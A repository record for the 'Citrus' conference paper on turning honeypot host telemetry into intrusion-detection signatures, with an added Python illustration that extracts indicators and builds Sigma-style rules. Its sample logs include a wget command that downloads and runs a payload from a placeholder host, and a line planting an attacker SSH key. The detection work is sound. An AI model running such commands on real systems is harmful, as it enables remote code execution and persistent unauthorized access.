Ryan Mills
Citrus: Orchestrating Security Mechanisms via Adversarial Deception
Mills, Ryan; Race, Nicholas; Broadbent, Matthew
Abstract
Despite the Internet being an apex of human achievement for many years, malicious activity and cyber attacks are becoming more prevalent than ever before. Large-scale data collection using threat sources such as honeypots has recently been employed to gather information relating to these attacks. While this data naturally details attack properties, there exist challenges in extracting the relevant information from vast data sets to provide valuable insight and a standard description of the attack. Traditionally, threats are identified through the use of signatures that are crafted manually through the composition of IOCs (Indicators of Compromise) extracted from telemetry captured during an attack process, a task often administered by an experienced engineer. These signatures have proven effective in their use by IDSs (Intrusion Detection Systems) to detect emerging threats. However, little research has been done on automating the extraction of emerging IOCs and the generation of corresponding signatures that incorporate host artefacts. In this paper we present Citrus: a novel approach to the generation of signatures that incorporates host-based telemetry extracted from honeypot endpoints. Leveraging this visibility at an endpoint grants a detailed understanding of bleeding-edge attack tactics, techniques, and procedures gathered from host logs.
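The abstract describes composing IOCs extracted from honeypot host telemetry into IDS signatures. As an added illustration of that idea, not code from the Citrus paper (whose pipeline is not detailed on this page), the following Python parses a few constructed honeypot host log lines, extracts candidate IOCs (attacker source IP, payload URL and host, dropped-file path and hash, executed commands), filters obvious noise, and composes what remains into Sigma-style detection rules. The log line format, the `sshd`/`bash`/`fim` source names, the benign-command list, the excluded honeypot address and the Sigma field names are all assumptions made for this example.

```python
"""Extract IOCs from honeypot host telemetry and compose Sigma-style rules.

Added illustration only: the log format, field names, benign-command list and
rule layout below are assumptions for this example, not the Citrus pipeline.
"""
import ipaddress
import json
import re
from urllib.parse import urlparse

# Constructed sample lines in the style a honeypot endpoint might record
# (SSH authentication, shell commands, file-integrity events). Not real data;
# addresses are from the RFC 5737 documentation ranges.
SAMPLE_HOST_LOGS = """\
2020-04-20T10:01:02Z sshd[1201]: Accepted password for root from 203.0.113.45 port 51234 ssh2
2020-04-20T10:01:05Z bash[1210]: root: cd /tmp; wget http://198.51.100.7/x86 -O /tmp/.x; chmod +x /tmp/.x; /tmp/.x
2020-04-20T10:01:06Z fim[1300]: created /tmp/.x sha256=9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
2020-04-20T10:01:07Z bash[1210]: root: echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 attacker' >> /root/.ssh/authorized_keys
2020-04-20T10:02:00Z sshd[1201]: Accepted password for root from 203.0.113.45 port 51301 ssh2
"""

# Assumed noise filters: the honeypot's own management address (constructed)
# and shell builtins that carry no detection value on their own.
EXCLUDED_IPS = {"192.0.2.10"}
BENIGN_COMMAND_PREFIXES = ("cd ", "exit", "clear")

LOGIN_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\w+) from (\d{1,3}(?:\.\d{1,3}){3})")
SHELL_RE = re.compile(r"bash\[\d+\]: \w+: (.*)$")
FILE_RE = re.compile(r"fim\[\d+\]: created (\S+)(?: sha256=([0-9a-f]{64}))?")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _keep_ip(ip):
    """Drop loopback/link-local addresses and the honeypot's own addresses."""
    addr = ipaddress.ip_address(ip)  # raises ValueError for non-IP input
    return ip not in EXCLUDED_IPS and not (addr.is_loopback or addr.is_link_local)


def extract_iocs(log_text):
    """Return de-duplicated IOC lists keyed by type, in first-seen order."""
    iocs = {"source_ips": [], "commands": [], "urls": [], "payload_ips": [],
            "payload_domains": [], "files": [], "hashes": []}
    for line in log_text.splitlines():
        if m := LOGIN_RE.search(line):
            if _keep_ip(m.group(2)):
                iocs["source_ips"].append(m.group(2))
        if m := SHELL_RE.search(line):
            # Split compound command lines so each stage becomes its own IOC.
            for cmd in (c.strip() for c in m.group(1).split(";")):
                if cmd and not cmd.startswith(BENIGN_COMMAND_PREFIXES):
                    iocs["commands"].append(cmd)
        if m := FILE_RE.search(line):
            iocs["files"].append(m.group(1))
            if m.group(2):
                iocs["hashes"].append(m.group(2))
        for url in URL_RE.findall(line):
            iocs["urls"].append(url)
            host = urlparse(url).hostname
            if not host:
                continue
            try:
                if _keep_ip(host):
                    iocs["payload_ips"].append(host)
            except ValueError:  # a domain name rather than an IP literal
                iocs["payload_domains"].append(host)
    return {k: list(dict.fromkeys(v)) for k, v in iocs.items()}


def build_rules(iocs, tag="honeypot-derived"):
    """Compose one Sigma-style rule per telemetry source that yielded IOCs.

    A selection given as a list of single-key maps is an OR in Sigma, which is
    what we want across alternative fields. Field names are assumed and must
    be mapped to the target SIEM's schema.
    """
    specs = [
        ("Honeypot-observed SSH login source", {"product": "linux", "service": "auth"},
         {"SourceIp": iocs["source_ips"]}),
        ("Honeypot-observed attacker commands", {"product": "linux", "category": "process_creation"},
         {"CommandLine|contains": iocs["commands"]}),
        ("Honeypot-observed payload hosts", {"product": "linux", "category": "network_connection"},
         {"DestinationIp": iocs["payload_ips"], "DestinationHostname": iocs["payload_domains"]}),
        ("Honeypot-observed dropped files", {"product": "linux", "category": "file_event"},
         {"TargetFilename": iocs["files"]}),
    ]
    rules = []
    for title, logsource, fields in specs:
        selection = [{k: v} for k, v in fields.items() if v]
        if not selection:
            continue  # no evidence of this kind in the telemetry
        rules.append({"title": title, "status": "experimental", "logsource": logsource,
                      "detection": {"selection": selection, "condition": "selection"},
                      "tags": [tag], "level": "high"})
    return rules


if __name__ == "__main__":
    # JSON is a YAML subset, so this avoids a third-party YAML dependency.
    print(json.dumps(build_rules(extract_iocs(SAMPLE_HOST_LOGS)), indent=2))
```

The file hash is extracted but deliberately not emitted as a rule field, because Sigma's Linux `file_event` schema has no standard hash field; it is left in the IOC set for enrichment or a separate hash-based feed. Extraction like this is only as good as its noise filters: the benign-command list and excluded addresses above are placeholders and would need tuning against a real honeypot's baseline before any generated rule is deployed.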
Citation
Mills, R., Race, N., & Broadbent, M. (2020, April). Citrus: Orchestrating Security Mechanisms via Adversarial Deception. Presented at NOMS 2020 - 2020 IEEE/IFIP Network Operations and Management Symposium, Budapest, Hungary
Field | Value
---|---
Presentation Conference Type | Conference Paper (published)
Conference Name | NOMS 2020 - 2020 IEEE/IFIP Network Operations and Management Symposium
Start Date | Apr 20, 2020
End Date | Apr 24, 2020
Online Publication Date | Jun 8, 2020
Publication Date | 2020
Deposit Date | Mar 8, 2022
Publisher | Institute of Electrical and Electronics Engineers
Series ISSN | 2374-9709
Book Title | NOMS 2020 - 2020 IEEE/IFIP Network Operations and Management Symposium
DOI | https://doi.org/10.1109/NOMS47738.2020.9110443
Public URL | http://researchrepository.napier.ac.uk/Output/2844089